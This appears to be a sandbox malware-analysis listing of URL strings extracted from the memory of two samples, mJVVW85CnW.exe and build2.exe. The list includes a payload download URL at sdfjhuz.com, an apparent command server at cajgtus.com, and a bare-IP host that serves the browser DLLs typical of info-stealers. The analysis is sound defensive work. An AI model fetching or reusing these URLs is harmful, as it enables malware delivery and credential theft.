Source: mJVVW85CnW.exe, 00000006.00000002.4155930809.0000000000928000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test2/get.phpL
Source: build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815103515.00000000009F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microR
Source: build2.exe, 00000008.00000003.2064352897.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: build2.exe, 00000008.00000003.2064352897.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: build2.exe, 00000008.00000003.2064352897.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: mJVVW85CnW.exe, 00000004.00000003.1801057478.00000000097E0000.00000004.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1794086311.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: mJVVW85CnW.exe, 00000000.00000002.1692488180.0000000005E30000.00000040.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000001.00000002.1709912189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000003.00000002.1714943939.0000000005DF0000.00000040.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000005.00000002.1724733752.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: build2.exe, 00000008.00000003.2064352897.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: build2.exe, 00000008.00000003.2064352897.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: mJVVW85CnW.exe, 00000004.00000002.2333415250.0000000000706000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe
Source: mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exe$run
Source: mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sdfjhuz.com/dl/build2.exerun00
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: mJVVW85CnW.exe, 00000004.00000003.1787301168.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.amazon.com/
Source: mJVVW85CnW.exe, 00000006.00000003.1787543542.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: mJVVW85CnW.exe, 00000004.00000003.1787440673.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.live.com/
Source: build2.exe, 00000008.00000002.2360500626.000000006F21D000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: mJVVW85CnW.exe, 00000004.00000003.1787502520.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
Source: mJVVW85CnW.exe, 00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: mJVVW85CnW.exe, 00000004.00000003.1787571498.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.reddit.com/
Source: build2.exe, 00000008.00000002.2354682096.0000000020E6D000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: mJVVW85CnW.exe, 00000006.00000003.1787622498.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: mJVVW85CnW.exe, 00000004.00000003.1787662440.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.wikipedia.com/
Source: mJVVW85CnW.exe, 00000006.00000003.1787707351.0000000003570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/
Source: build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149
Source: build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/
Source: build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/.217.9.149
Source: build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149//
Source: build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/5
Source: build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/6
Source: build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/:
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/A
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/B
Source: build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/N
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/V
Source: build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/d
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/freebl3.dll
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/freebl3.dllVE
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/h
Source: build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/j
Source: build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/m
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/mozglue.dllPDT%
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/mozglue.dllZDB%
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/msvcp140.dll
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/msvcp140.dllde
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/n
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/nss3.dll
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/nss3.dllM
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/olders.vdf
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/petd
Source: build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/r
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/softokn3.dllBE
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/softokn3.dllLEP$
Source: build2.exe, 00000008.00000002.2351838122.0000000000514000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/sqln.dll
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/sqln.dllW
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/ss3.dll
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149/vcruntime140.dll
Source: build2.exe, 00000008.00000002.2351838122.000000000051A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149FCBAK
Source: build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.9.149HDAFB
Source: build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: mJVVW85CnW.exe, 00000004.00000003.1792034657.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: mJVVW85CnW.exe, 00000004.00000002.2333415250.00000000006AB000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1726781034.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155930809.00000000008C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: mJVVW85CnW.exe, 00000006.00000002.4155930809.00000000008C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/M
Source: mJVVW85CnW.exe, 00000001.00000003.1704452444.0000000000807000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000001.00000002.1711552638.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/VxX1
Source: mJVVW85CnW.exe, 00000004.00000002.2333415250.0000000000668000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000002.2332971120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1726781034.00000000006B9000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000004.00000003.1726781034.00000000006F7000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000005.00000002.1724733752.0000000005E10000.00000040.00001000.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155355080.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155930809.0000000000888000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000006.00000002.4155930809.00000000008C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: mJVVW85CnW.exe, 00000004.00000003.1726781034.00000000006F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json(Y
Source: mJVVW85CnW.exe, 00000006.00000002.4155930809.0000000000888000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json.
Source: mJVVW85CnW.exe, 00000001.00000003.1704320572.000000000082D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json9
Source: mJVVW85CnW.exe, 00000001.00000002.1711552638.00000000007B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsone
Source: mJVVW85CnW.exe, 00000004.00000003.1726781034.00000000006B9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsono
Source: mJVVW85CnW.exe, 00000001.00000003.1704452444.0000000000807000.00000004.00000020.00020000.00000000.sdmp, mJVVW85CnW.exe, 00000001.00000002.1711552638.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/x
Source: build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: mJVVW85CnW.exe, 00000004.00000003.1805471853.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/privacy-sdx.win32.bundle.js.map/e3b0c4429
Source: mJVVW85CnW.exe, 00000004.00000003.1792034657.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com
Source: mJVVW85CnW.exe, 00000004.00000003.1792034657.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets
Source: mJVVW85CnW.exe, 00000004.00000003.1792034657.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
Source: build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: build2.exe, 00000008.00000003.2002995683.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: build2.exe, 00000008.00000002.2352727542.0000000000948000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1812961840.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: mJVVW85CnW.exe, 00000004.00000003.1806077260.00000000097E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://clients3.google.com/generate_204
Source: build2.exe, 00000008.00000003.1815064490.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=EyWBqDQS-6jg&a
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1814804733.00000000009B2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=c4UneKQJ
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=2YYI
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: build2.exe, 00000008.00000002.2352727542.00000000009A2000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000002.2351838122.0000000000434000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1910879283.00000000009DE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1893256555.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1838899855.00000000009BE000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000008.00000003.1874722155.00000000009BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
